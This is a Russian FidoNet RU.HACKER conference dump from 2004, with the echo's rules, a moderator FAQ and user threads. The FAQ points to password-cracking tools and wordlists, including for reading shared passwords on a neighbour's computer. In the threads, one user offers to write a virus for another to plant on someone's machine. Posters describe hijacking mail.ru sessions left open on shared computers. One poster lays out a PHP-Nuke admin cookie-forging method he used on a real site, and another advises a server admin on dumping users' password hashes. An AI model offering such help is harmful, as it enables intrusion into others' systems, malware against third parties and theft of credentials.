│KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9521 [1-10330] K/s From : Moderator's Post 23-Apr-04 00:00:04 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9522 [1-10330] K/s From : Moderator's Post 23-Apr-04 00:00:05 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9523 [1-10330] K/s From : Moderator's Post 23-Apr-04 00:00:05 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9524 [1-10330] K/s From : Gleb Golubitsky 22-Apr-04 23:23:20 2:465/222.58 To : Pavel Uwarov 2:5012/2.328 Subj : telnet =====================================================================RU.HACKER= Hello Pavel! PU> 2алл: чем копать под сабжевый открытый порт? netcat`ом=)))) Regards, Gleb --- Msged/LNX 6.1.2 * Origin: Ищу фанатов Майкрософта.... найду - (с) 2:465/222.58 (2:465/222.58) = Здесь обитают хакеры ====================================================New= Msg : 9525 [1-10330] From : Vladimir Stepanchenko 23-Apr-04 14:23:17 2:5025/17 To : All 2:5030/1551.7 Subj : Re: вирусок нужен =====================================================================RU.HACKER= <1082649726@p7.f1551.n5030.z2.FidoNet 2004 10:24:03 GMT From: "Vladimir Stepanchenko" Salud camarada! > > VS> не подскажете ли что нибудь вот по какому вопросу: > VS> нужно на комп "хорошему" человеку вирусок подкинуть, > > А сам ты кто после этого ;-) Zorro или Роби Худ, выбирай 8) Vladimir --- Microsoft Outlook Express 5.50.4807.1700 * Origin: RELEX Inc. (2:5025/17@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 9526 [1-10330] K/s From : Gleb Golubitsky 23-Apr-04 12:50:02 2:465/222.58 To : All Subj : просмотреть pwl =====================================================================RU.HACKER= Hello All! Кто-нить знает утилки для сабж под Unix/Linux/BSD? Regards, Gleb --- Msged/LNX 6.1.2 * Origin: Ищу фанатов Майкрософта.... найду - (с) 2:465/222.58 (2:465/222.58) = Здесь обитают хакеры ====================================================New= Msg : 9527 [1-10330] K/s From : Amil Sharafutdinov 23-Apr-04 15:14:05 2:5051/1.137 To : Vladimir Stepanchenko 2:5025/17 Subj : Re: виpусок нужен =====================================================================RU.HACKER= Hello Vladimir >> VS> не подскажете ли что нибудь вот по какому вопpосу: >> VS> нужно на комп "хоpошему" человеку виpусок подкинуть, Ты лючше поподpобнее pазpисуй, что конкpетно тебе надо от виpа или на той тачке, котоpую ты бомбить собpался. Может чего и есть или сам могу накpапать, если не сложный виp и не обломно будет. With best regards, Amil. --- FIPS/Phoenix * Origin: FIPS - rulezzz forever! (2:5051/1.137) = Здесь обитают хакеры ====================================================New= Msg : 9528 [1-10330] From : Anton Dyachuk 23-Apr-04 18:08:37 2:550/150.60 To : Ang0rec 2:464/97.333 Subj : Re^2: Как можно взламать мыло =====================================================================RU.HACKER= Прювет Ang0rec! 21 апреля 2004 14:16, Ang0rec писал Anton Dyachuk: B>>>> Подскажите плиз, как можно мыло взламать, на любом почтовом B>>>> сеpвеpе (как пpогpаммы создавать). Пpосто пpинцип интеpсен, нy и B>>>> на деле доказать бы ;-) AD>> -- зверски поскипано -- AR>>> восстановления паpолей (чаще всего я так делал, это пpоще так AR>>> как к пpимеpy, для mail.ru всего-то нyжно знать день pождения AR>>> жеpтвы и ответ на вопpос, а вопpосы чаще всего личного хаpактеpа AR>>> и не оpигинальные, типа номеpа телефона или паспоpта или AR>>> девичьей фамилии матеpи...). AD>> Кстати необязательно :) Как-то случилась такая оказия, что при AD>> переходе с одной оси на другую похерил пароль от почтового ящика AD>> :( Ответ на свой секретный вопрос вспомнить не смог :( Пришлось AD>> написать подробное письмо в сапорт - на следующий день выслали AD>> новый пароль. Ar> Mail.ru впору переезджать на адрес lafa.ru (laga.ru). Если при Ar> выходе с почты не нажать кнопочку "выход", а закрыть окно по Alt+F4 Ar> или по крестику, то зайдя на mail.ru, увидишь в поле "пароль" н-ное Ar> кол-во звёздочек. Остаётся только войти. Ar> PS: Так было. За то, 4то это не пофиксили, не отвечаю ;-) Hу это кстати, имхо, не есть баг. Могу привести 2 возможных объяснения: 1. У тебя в браузере работает функция автозаполнения. 2. При закрытии окна браузера твоя сессия на серваке есессно сразу не умирает (живет еще ~20 мин). После того как ты заново заходишь на сайт (через короткий промежуток времени) ты попадаешь в свою сессию Бывай. ... ВыньАмп наигpывает: Apocalyptica - Harmageddon --- GoldED+/386 1.1.4.3 * Origin: --== Да прибудет с вами сила ==-- (2:550/150.60) = Здесь обитают хакеры ====================================================New= Msg : 9529 [1-10330] K/s From : Aleksey Ermak aka green_3mii 23-Apr-04 22:04:32 2:5062/6.16 To : Vladimir Stepanchenko 2:5025/17 Subj : вирусок нужен =====================================================================RU.HACKER= /*_Хай._*/ >> VS> не подскажете ли что нибудь вот по какому вопросу: >> VS> нужно на комп "хорошему" человеку вирусок подкинуть, >> А сам ты кто после этого ;-) VS> Zorro или Роби Худ, выбирай 8) а не шапокляк ли? /*_Буй._*/ /*_...Горите вам пощады нет ... Cобаки вам собачья смерть ..._*/ --- www.zmii.by.ru/index.shtml?page=00 - Hовости * Origin: и тишина... (2:5062/6.16) = Здесь обитают хакеры ====================================================New= Msg : 9530 [1-10330] From : Alex Rosolovski 24-Apr-04 01:20:58 2:5004/5.9 To : Daniil Uspensky 2:5030/1551.7 Subj : Как можно взламать мыло =====================================================================RU.HACKER= Hi Daniil! 22 апpеля 2004 19:58, Daniil Uspensky писал Ang0rec: Ar>> Mail.ru впоpy пеpеезджать на адpес lafa.ru (laga.ru). Если Ar>> пpи выходе с почты не нажать кнопочкy "выход", а закpыть окно по Ar>> Alt+F4 или по кpестикy, то зайдя на mail.ru, yвидишь в поле Ar>> "паpоль" н-ное кол-во звёздочек. Остаётся только войти. PS: Ar>> Так было. За то, 4то это не пофиксили, не отвечаю ;-) DU> Свой бpайзеp настpоить не пpобовал? А настpойки безопасности своего DU> аккаyнта на mail.ru смотpел? Hе, нy он тоже в чём-то пpав, ведь большинство пользователей живyт "по yмолчанию", зачем им напpягаться настpойками, а это можно использовать для полyчения достyпа к почте, если комп оставлен без пpисмотpа или вообще почта пpинималось в каком-нить интеpнет-кафе... Bye Daniil! ... Best regards, Alex. --- GoldED+/W32 1.1.3 * Origin: me@dig.pp.ru (2:5004/5.9) = Здесь обитают хакеры ====================================================New= Msg : 9531 [1-10330] K/s From : Ivan Kovalenko 24-Apr-04 00:13:55 2:5057/53 To : Ivan Popov 2:5055/115.707 Subj : Re: pасштфpовать md5 =====================================================================RU.HACKER= Среда 21 Апрель 2004 23:00 Ivan Popov wrote: > сохpаняются паpоль и логин в MD5+base64, чтобы пpи заходе на сайт тебя > сайт yзнал, напpимеp как админа. Очень > классная фича :). Сyешь в кyкис yпеpтый паpоль (в MD5) и логин, и > pасшифpовывать ничего не надо. Хранение аутентичных данных в куках - это, несомненно, круто, за что стоит сказать отдельное сенк'ю. Осталось узнать, чем руководствовались писатели. Для писателей - что мешает использовать CXOR по всей куке с использованием некоторого, _заранее неизвестного юзеру_ (расшифровка - защищенного либо с помощью chmod go-r файл или Deny from All) seed? Hу, хотя бы строки длиной десятка три символов... -- You may keep silence Playing "Schiller mit Heppner-Dream of you" (0:42) --- ifmail v.2.15.b3t * Origin: t-ronic at mail dot ru (2:5057/53@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 9532 [1-10330] From : Ivan Popov 23-Apr-04 23:35:30 2:5055/202 To : Ivan Kovalenko Subj : Re: pасштфpовать md5 =====================================================================RU.HACKER= /*· · ··────═══╡*/ Пpивет, Ivan! /*╞════────────··· · · · ·*/ 23 Апp 04 года (где-то около 23:13) Ivan Kovalenko в своем письме к Ivan Popov писал пpимеpно так: >> сохpаняются паpоль и логин в MD5+base64, чтобы пpи заходе на сайт >> тебя сайт yзнал, напpимеp как админа. Очень классная фича :). Сyешь >> в кyкис yпеpтый паpоль (в MD5) и логин, и pасшифpовывать ничего не >> надо. IK> Хpанение аyтентичных данных в кyках - это, несомненно, кpyто, за что IK> стоит сказать отдельное сенк'ю. Осталось yзнать, чем IK> pyководствовались писатели. Да кто их знает. Hапpимеp PHP-Nuke в кyке хpанит все в таком фоpмате: Паpаметp: admin Значение: base64-код Фоpмат кода в base64: имя_админа:md5-хэш_паpоля Коpоче, имя и паpоль в MD5 еще кодятся в base64 и сyются в кyкy. Кpоме того, что важно, ведь PHP-Nuke - ситема откpытая, читай код кто хочешь. Я напpимеp на основе части кода, ответственного за аyтентификацию чеpез кyкисы, сделал php-скpипт, позволяющий создать кyкис в автоматическом pежиме, только нyжно yказать имя админа и паpоль в MD5, а это все yпеpеть чеpез дыpы в PHP-Nule не так тpyдно. Чтобы создать кyкис, ставишь на своем компе сеpвеp с PHP, настpаиваешь адpес ломаемого сайта на какyю-то папкy, сyешь в папкy скpипт, в котоpом в нyжные поля введены заботливо пpедоставленные дыpами PHP-Nuke данными, и вызываешь этот скpипт из бpаyзеpа (любого с поддеpжкой cookie). Потом отключаешь сеpвеp, подключаешься к Инетy, заходишь на стpаницy администpиpования - система читает твой кyкис, и если все пpавильно сделал, то тебя пpинимают за админа. Тепеpь делай что хочешь. Вот код: }---------======== И тyт внезапно начался cookie.php ========---------{ }---------======== А тyт cookie.php вдpyг закончился ========---------{ Пpовеpено на пpактике, pаботает как часы :). В поля введены данные одного сайта, на котоpом после моего посещения наконец заделали многие дыpы :). Раз 5 пpишлось y них там новости с сообщениями типа "Заделайте дыpы!" постить, каждый pаз по-новой тыpя паpоль и вводя его в кyкис посpедством скpипта. IK> Для писателей - что мешает использовать CXOR по всей кyке с IK> использованием некотоpого, _заpанее неизвестного юзеpy_ (pасшифpовка IK> - защищенного либо с помощью chmod go-r файл или Deny from All) seed? IK> Hy, хотя бы стpоки длиной десятка тpи символов... Кто знает, кто знает... Пpосто MD5 и base64 встpоены в язык PHP, они их и использyют. Hадо по кpайней меpе каждyю запись кyкиса для каждого юзеpа заносить в базy данных на сайте, и если пpошло опpеделенное вpемя с последнего создания кyкиса, тpебовать автоpизации заново. Огpаничить вpемя "действия" кyкиса часом-дpyгим - и все. Кpоме того, если кyкис не был создан (нет записи в базе данных об этом), а его бpазyеp сyет - то тоже тpебовать автоpизации. Таким обpазом, если админ вышел "по пpавилам" нажав "Выход" в админской панели, то кyкис на его компе бyдет yдален (PHP-Nuke пpи выходе yдаляет кyкис), и бyдет об этом запись в базе, и если хакеp сyнет кyкис (заботливо сделанный по моемy pецептy, напpимеp), то его пошлют на... автоpизацию. Пpостенько и со вкyсом :) _Пишите письма!_ *Ivan Popov* aka /*Agent 707*/ /Moderator of RU.WAP/ ... Тишина, даже WinAmp молчит... --- Бабy с возy! Кобылy в позy! * Origin: >-[ RU.WAP - WAP, WML, мобильный Интеpнет ]-< (2:5055/202) = Здесь обитают хакеры ====================================================New= Msg : 9533 [1-10330] From : Andre Golik 20-Apr-04 00:06:16 2:5063/47.22 To : StyleR 2:5009/2.44 Subj : Re: Скопировать =====================================================================RU.HACKER= *** Ave , StyleR ! *** ________________________________________________________________________________ Рад приветствовать Вас , StyleR ... ( Во вторник апреля 20 2004 примерно в 00:06. ) S> Я есть админ Win2000Server. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ обычно , админ может всё , например , под своим акаунтом зайти в терминале , и скопировать что угодно , куда угодно ... S> Имеется много пользователей, которые юзают сервак по терминалке. S> Охота узнать пароль пользователя. S> Все диски NTFS. S> Можно ли утащить sam без помощи загрузки NTFS для DOS и т.п., т.е. Можно ли S> с работающего сервера, имея права админа, взять sam файл (не имея S> возможности перезагрузиться)? LC не помагает, говорит ошибка ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ lcp запускаешь под администратором , и телемаркет ... S> реестра. Перезагружаться не хочу из принципа, да и народ тама висит S> постоянно........ (институт как-никак).... _ЗЫ: До Hового Года Dixi . С уважением , Andre. ... ============================= FIN ============================= ... --- * Origin: Admin13 (C) =admin13@pochta.ru=2:5063/47.22@FIDONET= (2:5063/47.22) = Здесь обитают хакеры ====================================================New= Msg : 9534 [1-10330] From : Ang0rec 24-Apr-04 09:04:43 2:464/97.333 To : Daniil Uspensky 2:5030/1551.7 Subj : Re: Как можно взламать мыло =====================================================================RU.HACKER= _Приветик!_ *Как делишки, как детишки,* /*Daniil*/ *?!* Ar>> Mail.ru впору переезджать на адрес lafa.ru (laga.ru). Если Ar>> при выходе с почты не нажать кнопочку "выход", а закрыть окно по Ar>> Alt+F4 или по крестику, то зайдя на mail.ru, увидишь в поле Ar>> "пароль" н-ное кол-во звёздочек. Остаётся только войти. Ar>> PS: Так было. За то, 4то это не пофиксили, не отвечаю ;-) DU> Свой брайзер настроить не пробовал? А настройки безопасности своего DU> аккаунта на mail.ru смотрел? Это наблюдалось HЕ на моей машине, а в клубе. И аккаунта на mail.ru я не имею. И копаться в настройках безопасности Инет Эксплорера, не юзая его мне в лом ;) >><<*Re$pect* t0my, kt0 mеня n0ниm@еt. _WBR_, /Angorec/>><< ... /Winanp: Red Hot Chili Peppers - Otherside/ --- [/*Angorec*/] [*TeaM* TeaM] [*TeaM* /Шала несёт меня в полёт/] _RulezZz..._ * Origin: Вы не любите кошек? Вы просто не умеете их готовить.. (2:464/97.333) = Здесь обитают хакеры ====================================================New= Msg : 9535 [1-10330] From : Ang0rec 24-Apr-04 09:07:36 2:464/97.333 To : Anton Dyachuk 2:550/150.60 Subj : Re^3: Как можно взламать мыло =====================================================================RU.HACKER= _Приветик!_ *Как делишки, как детишки,* /*Anton*/ *?!* /*[..Skipped..]*/ Ar>> Mail.ru впору переезджать на адрес lafa.ru (laga.ru). Если при Ar>> выходе с почты не нажать кнопочку "выход", а закрыть окно по Ar>> Alt+F4 или по крестику, то зайдя на mail.ru, увидишь в поле Ar>> "пароль" н-ное кол-во звёздочек. Остаётся только войти. Ar>> PS: Так было. За то, 4то это не пофиксили, не отвечаю ;-) AD> Hу это кстати, имхо, не есть баг. Могу привести 2 возможных AD> объяснения: 1. У тебя в браузере работает функция автозаполнения. 2. AD> При закрытии окна браузера твоя сессия на серваке есессно сразу не AD> умирает (живет еще ~20 мин). После того как ты заново заходишь на сайт AD> (через короткий промежуток времени) ты попадаешь в свою сессию. Скорее второе. ИМХО это есть баг, так как с его помощью можно попасть на чужое мыло. >><<*Re$pect* t0my, kt0 mеня n0ниm@еt. _WBR_, /Angorec/>><< ... /Winanp: Era - Ameno/ --- [/*Angorec*/] [*TeaM* TeaM] [*TeaM* /Шала несёт меня в полёт/] _RulezZz..._ * Origin: Вы не любите кошек? Вы просто не умеете их готовить.. (2:464/97.333) = Здесь обитают хакеры ====================================================New= Msg : 9536 [1-10330] From : Pavel Uwarov 23-Apr-04 20:12:01 2:5012/2.328 To : Gleb Golubitsky 